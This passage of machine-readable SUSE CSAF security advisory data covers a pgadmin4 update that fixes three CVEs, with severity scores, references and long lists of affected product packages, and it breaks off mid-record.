"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-14T13:03:13Z",
"details": "important"
}
],
"title": "CVE-2025-27152"
}
]
}
SUSE-SU-2025:1326-1
Vulnerability from csaf_suse - Published: 2025-04-16 08:37 - Updated: 2025-04-16 08:37Summary
Security update for pgadmin4
Notes
Title of the patch
Security update for pgadmin4
Description of the patch
This update for pgadmin4 fixes the following issues:
- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)
- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user's session if two users authenticate simultaneously via ldap (bsc#1234840)
- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)
Patchnames
SUSE-2025-1326,SUSE-SLE-Module-Python3-15-SP6-2025-1326,SUSE-SLE-Product-HPC-15-SP3-LTSS-2025-1326,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2025-1326,SUSE-SLE-Product-HPC-15-SP4-LTSS-2025-1326,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2025-1326,SUSE-SLE-Product-HPC-15-SP5-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP3-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP4-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP5-LTSS-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP3-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP4-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP5-2025-1326,SUSE-SLE-Product-SUSE-Manager-Proxy-4.3-2025-1326,SUSE-SLE-Product-SUSE-Manager-Server-4.3-2025-1326,SUSE-Storage-7.1-2025-1326
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for pgadmin4",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for pgadmin4 fixes the following issues:\n\n- CVE-2025-27152: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)\n- CVE-2023-1907: Fixed an issue which could result in users being authenticated in another user\u0027s session if two users authenticate simultaneously via ldap (bsc#1234840)\n- CVE-2024-4068: Fixed a possible memory exhaustion (bsc#1224295)\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-1326,SUSE-SLE-Module-Python3-15-SP6-2025-1326,SUSE-SLE-Product-HPC-15-SP3-LTSS-2025-1326,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2025-1326,SUSE-SLE-Product-HPC-15-SP4-LTSS-2025-1326,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2025-1326,SUSE-SLE-Product-HPC-15-SP5-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP3-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP4-LTSS-2025-1326,SUSE-SLE-Product-SLES-15-SP5-LTSS-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP3-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP4-2025-1326,SUSE-SLE-Product-SLES_SAP-15-SP5-2025-1326,SUSE-SLE-Product-SUSE-Manager-Proxy-4.3-2025-1326,SUSE-SLE-Product-SUSE-Manager-Server-4.3-2025-1326,SUSE-Storage-7.1-2025-1326",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_1326-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:1326-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-20251326-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:1326-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-April/039030.html"
},
{
"category": "self",
"summary": "SUSE Bug 1224295",
"url": "https://bugzilla.suse.com/1224295"
},
{
"category": "self",
"summary": "SUSE Bug 1234840",
"url": "https://bugzilla.suse.com/1234840"
},
{
"category": "self",
"summary": "SUSE Bug 1239308",
"url": "https://bugzilla.suse.com/1239308"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-1907 page",
"url": "https://www.suse.com/security/cve/CVE-2023-1907/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-4068 page",
"url": "https://www.suse.com/security/cve/CVE-2024-4068/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27152 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27152/"
}
],
"title": "Security update for pgadmin4",
"tracking": {
"current_release_date": "2025-04-16T08:37:10Z",
"generator": {
"date": "2025-04-16T08:37:10Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:1326-1",
"initial_release_date": "2025-04-16T08:37:10Z",
"revision_history": [
{
"date": "2025-04-16T08:37:10Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.aarch64",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64",
"product_id": "pgadmin4-4.30-150300.3.18.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.i586",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.i586",
"product_id": "pgadmin4-4.30-150300.3.18.1.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-doc-4.30-150300.3.18.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-web-4.30-150300.3.18.1.noarch"
}
},
{
"category": "product_version",
"name": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch",
"product": {
"name": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch",
"product_id": "pgadmin4-web-uwsgi-4.30-150300.3.18.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"product_id": "pgadmin4-4.30-150300.3.18.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.s390x",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x",
"product_id": "pgadmin4-4.30-150300.3.18.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "pgadmin4-4.30-150300.3.18.1.x86_64",
"product": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64",
"product_id": "pgadmin4-4.30-150300.3.18.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-python3:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Proxy 4.3",
"product": {
"name": "SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-proxy:4.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Server 4.3",
"product": {
"name": "SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-server:4.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Enterprise Storage 7.1",
"product": {
"name": "SUSE Enterprise Storage 7.1",
"product_id": "SUSE Enterprise Storage 7.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:ses:7.1"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6",
"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP3-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP3-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.s390x as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.x86_64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-doc-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-4.30-150300.3.18.1.noarch as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch"
},
"product_reference": "pgadmin4-web-4.30-150300.3.18.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-4.30-150300.3.18.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64"
},
"product_reference": "pgadmin4-4.30-150300.3.18.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
